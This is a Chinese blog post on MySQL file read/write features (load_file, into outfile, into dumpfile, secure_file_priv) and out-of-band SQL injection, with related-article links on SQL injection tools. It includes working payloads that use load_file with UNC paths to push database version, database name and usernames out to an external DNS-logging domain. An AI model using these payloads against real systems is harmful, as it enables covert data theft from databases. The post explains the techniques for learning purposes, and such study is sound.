mysql oob_mysql 读写文件特性和OOB注入

最新推荐文章于 2023-03-06 09:37:36 发布
最新推荐文章于 2023-03-06 09:37:36 发布
阅读量186 收藏
点赞数
文章标签: mysql oob
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_29774679/article/details/114329138
版权

Mysql 中读写文件主要是load_file和into outfile 和 into dumpfile, mysql 的导入导出的功能从mysql5版本起都受 系统变量@@secure_file_prev 影响,我们来看一下官方的解释

66e4b0091e89ecabeb97eba796d9a448.png

image.png

This option sets the secure_file_priv system variable, which is used to limit the effect of data import and export operations, such as those performed by the LOAD DATA and SELECT ... INTO OUTFILE statements and the LOAD_FILE() function. For more information, see the description of secure_file_priv.

在<=5.7.5版本的mysql里面默认值为empty, 在大于5.7.6里面是platform sepcific(linux 默认是/var/lib/mysql-files),表示读写只能在这个目录下面。(有的文章说是5.5.53版本开始,这个未做考证,暂时以官方为主)

该变量有三种取值,empty,NULL, 某个具体路径:

如果变量设置为目录的名称,则服务器会将导入和导出操作限制在跟这个目录中一起使用。这个目录必须存在,服务器不会自己创建它。

如果变量为空,则不会产生影响,引起不安全的配置。

如果变量设置为NULL,那么服务器就会禁用导入和导出操作。这个值从(MySQL 5.5.53)版本开始允许。

Secure_file_priv是一个全局变量,它是一个只读变量,你不能在运行时改变它。也就是说如果此种注入比较依赖版本。修改这个值的方法只能在配置文件里面修改,在mysql里面是无法修改的。

windows下:修改my.ini

在[mysqld]内加入secure_file_priv =

linux下:修改my.cnf(可能是/etc/mysql/mysql.conf.d/mysqld.cnf)

在[mysqld]内加入 secure_file_priv =/tmp

然后重启mysql,再查询secure_file_priv

into outfile 和 into dumpfile的区别

outfile 写完文件后会在文件后加一个\n换行符,而dumpfile不会

mysql> select 'aaaa' into outfile '/var/lib/mysql-files/1.php';

Query OK, 1 row affected (0.03 sec)

mysql> select load_file('/var/lib/mysql-files/1.php');

+-----------------------------------------+

| load_file('/var/lib/mysql-files/1.php') |

+-----------------------------------------+

| aaaa

|

+-----------------------------------------+

1 row in set (0.00 sec)

mysql> select 'xxxx' into dumpfile '/var/lib/mysql-files/2.php';

Query OK, 1 row affected (0.00 sec)

mysql> select load_file('/var/lib/mysql-files/2.php');

+-----------------------------------------+

| load_file('/var/lib/mysql-files/2.php') |

+-----------------------------------------+

| xxxx |

+-----------------------------------------+

这两个函数的原本作用是导出数据做备份。

mysql> select * into outfile '/tmp/x.sql' from user;

Query OK, 3 rows affected (0.00 sec)

cat /tmp/x.sql

1 admin admin

2 r00t r00t

3 61d 61d

注意outfile 和 dumpfile后面的路径都不能是十六进制。请注意,如果过滤引号,无法使用十六进制会话或者其他格式作为文件路径

mysql OOB带外注入

当涉及到MSSQL与Oracle时,Out-of-Band 注入是非常好的方式, 但在mysql中却并非如此,因为mysql的secure_file_priv 配置禁止了mysql的导入导出。

解决的办法:

在mysqld的配置中设置该属性为空

secure-file-priv=

下面的payload 也都只能在window下执行,在linux下运行不了,这个还不知道为什么。

OOB注入语句:

select load_file(concat('\\\\',version(),'.h7x7ty.ceye.io\\a.txt'));

select load_file(concat('\\\\',database(),'.h7x7ty.ceye.io\\a.txt'));

68db76a13bd8f094f47d7361fe74e7fc.png

image.png

另外,查询的数据中不能有特殊字符,因为concat做的是连接操作,查询的数据会作为子域名的一部分,如果域名中存在特殊字符(比如都好,* {}等)就会解析失败,因此最好就一个hex函数加密传输一下)

select load_file(concat('\\\\',(select hex(group_concat(username)) from ctf.user limit 1),'1.h7x7ty.ceye.io\\a.txt'));

06f25efa15682ac8f0e566d607044b29.png

image.png

参考:

https://segmentfault.com/a/1190000009333563

https://dev.mysql.com/doc/refman/5.7/en/server-options.html

http://c1em0.cn/2017/11/14/MySQL%20OOB%E6%B3%A8%E5%85%A5/

哲哲烘培
关注
从SQL注入了解OOB(带外通道)
weixin_43303273的博客
09-18 1314
这是以前做的一个PPT sql注入利用要求
Sql注入漏洞汇总-上
最新发布
黑战士的博客
06-04 724
DNSlog注入,也叫DNS带外查询,它是属于带外通信的一种(Out of Band,简称OOB)。寻常的注入基本都是在同一个信道上面的,比如正常的get注入,先在url上插入payload做HTTP请求,然后得到HTTP返回包,没有涉及其他信道。而所谓的带外通信,至少涉及两个信道信道:在计算机中指通信的通道,是信号传输的媒介。
mysql注入-OOB注入
weixin_44316992的博客
12-07 1093
OOB注入 带外通道技术(Out-Of-Band ) 带外通道技术(OOB)让攻击者能够通过另一种方式来确认和利用没有直接回显的漏洞。 这一类漏洞中,攻击者无法通过恶意请求直接在响应包中看到漏洞的输出结果。 带外通道技术通常需要脆弱的实体来生成带外的TCP/UDP/ICMP请求,然后,攻击者可以通过这个请求来提取数据。 利用条件: 脆弱的系统 预备知识点 DNS查询 UNC路径——可以用于共享文件夹 UNC( Universal Naming Convention)/通用命名规则 Windows主机默认
OOB注入
yybzzz的博客
05-18 589
目录条件对比预备知识DNSDNS迭代查询原理泛域名解析UNC路径tcpdumpload_file()环境搭建漏洞利用 OUT OF BAND(带外通道技术) 让攻击者能够通过另一种方式来确认和利用没有直接回显的漏洞 可以看作一种速度具有优势的盲注,因为实现了变相回显 条件 系统存在漏洞,允许我们构建恶意请求 外围防火墙的出站策略:攻击目标需要向指定的另外一个目标发送特殊请求,因此要求防火墙对特殊请求能够放行 对比 攻击类别 SQL注入类型 说明 INBAND 报错型、联合查询 根据应
Mysql注入有关的知识点
qq_43776408的博客
06-04 172
Mysql 5.x以上数据结构 Navicat for MySQL其实是软件名字,不是命令 数据库>表>列>字段 很简单,字面意思都能理解 别忘了还有limit关键字 limit m,n从m行开始到m+n行显示 即给你显示特定的行 记住mysql第一行为0行,limit2,2意思就是从第三行到第四行 例如: 0 1 2 3 limit 2,2结果就是2 3 这个我很迷,但结果就是这样 注释 如果有WAF保护 那么倒数第二行可能行不通 但倒数第一行就可以 id=-1报错 执行注释内部
SQLMAP 注入教程
General的 CSDN 博客
11-15 5361
SQLMAP SQLMAP是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MySQL,Oracle,PostgreSQL,Microsoft SQL Server,Microsoft Access,IBM DB2,SQLite,Firebird,Sybase,SAP MaxDB,Informix,HSQLDB和H2数据库管理系统。 当给SQLMAP这么一个url的时候,它会: 判断可注入的参数 判断可以用那种SQL 注入技术来注入 识别出哪种数据
渗透测试 ( 6 ) --- SQL 注入神器 sqlmap
墨鱼菜鸡
07-11 3111
sqlmap 官网:http://sqlmap.org/ sqlmap文档地址:https://github.com/sqlmapproject/sqlmap/wiki/Usage sqlmap 使用 思维导图:http://download.csdn.net/detail/freeking101/9887831 黑帽与白帽都喜爱的十大SQL注入工具:...
Hack The Box -SQL Injection Fundamentals Module详细讲解中文教程
技术分享
07-24 1507
Hack The Box -SQL Injection Fundamentals Module详细讲解中文教程
Web安全Day1 - SQL注入实战攻防
hongrisec的博客
02-20 3149
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 本专题文章导航 1.Web安全Day1 - SQL注入实战攻防 https://mp.weixin.qq.com/s/zP0MZNhnZG_S9aoHDXzvWA 1. SQL注入 1.1 漏洞简介 结构化查询语言(Structured Query Language...
OOB9.0_oracle数据库操作工具
10-31
OOB9.0_oracle数据库操作工具,是一款十分好用的数据库客户端操作工具
mysql文件_mysql 读写文件特性OOB注入
weixin_32802111的博客
01-25 281
Mysql读写文件主要是load_file和into outfile 和 into dumpfile, mysql 的导入导出的功能从mysql5版本起都受 系统变量@@secure_file_prev 影响,我们来看一下官方的解释image.pngThis option sets the secure_file_priv system variable, which is used to ...
OOB攻击
Tisty的兵工厂--新Blog:http://www.UbuntuSky.cn
05-27 3111
<!--google_ad_client = "pub-7058131363132249";/* 468x15, 创建于 08-6-3 */google_ad_slot = "4187223796";google_ad_width = 468;google_ad_height = 15;//--> <script type="text/javascript"src=
高级的MSSQL注入技巧
CanMeng'Blog - 一个WEB安全渗透的技术爱好者
11-30 463
tl;dr 本文列举了几种改进的MSSQL注入技巧,所有的攻击向量都至少在三个最新版本的Microsoft SQL Server上进行了测试:2019、2017、2016SP2。 DNS Out-of-Band 如果遇到带有禁用堆栈查询的完全盲SQL注入,则可以通过函数 fn_xe_file_target_read_file, fn_get_audit_file,和fn_trace_gettable实现DNS带外(OOB)数据泄露。 利用fn_xe_file_target_read_file()的例子
【xxe主看这个1】学习xxe稍微进阶的知识 ---- OOB xxe盲注,外带
Zero_Adam的博客
04-12 1552
目录:1. 基本知识2.XML的安全性问题当文件内容和 xml 格式相冲突的时候,其他利用 https://www.freebuf.com/video/209186.html 这个是那个pvs的网站,要学习一下curl命令,然后就可以当作一个vps来用了 https://beeceptor.com/console/qwert 1. 基本知识 xml是一种可扩展标记语言,和html类似, 主要区别是 HTML 主要和 数据表示相关。而xml 更多与数据传输和存储有关。 xml可以用在这些地方,等等 我们现在
mysql配置secure_file_priv
jkzyx123的博客
09-06 8619
secure_file_priv 配置项控制LOAD DATA, SELECT …OUTFILE, LOAD_FILE()的使用权限。
修改 Mysql secure_file_prive 服务无法启动
qq_2393419394的博客
03-06 1255
修改 Mysql secure_file_prive 服务无法启动
PHPstudy mysql secure_file_priv 设置
一只正在不断努力的程序猿
09-19 2360
在做sqli-labs靶场第七关时针对遇见问题进行记录
导出数据提示--secure-file-priv选项问题的解决方法
jacklin_01的博客
05-30 6845
mysql可使用into outfile参数把表中数据导出到csv,例如可用以下命令把user表的数据导出到user.csv 1 select * from user into outfile '/tmp/user.csv' fields terminated by ',' optionally enclosed by '"' lines terminated by '\r\n 执行后,user表的数据会导出到/tmp/user.csv。 参数说明: int..
随机森林oob_score
09-02
在随机森林算法中,oob_score是指使用袋外样本(out of bag)来评估模型的准确度。每棵决策树在生成过程中,并没有使用所有的样本,其中未使用的样本就是袋外样本。通过将袋外样本用于评估每棵决策树的准确度,然后取...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值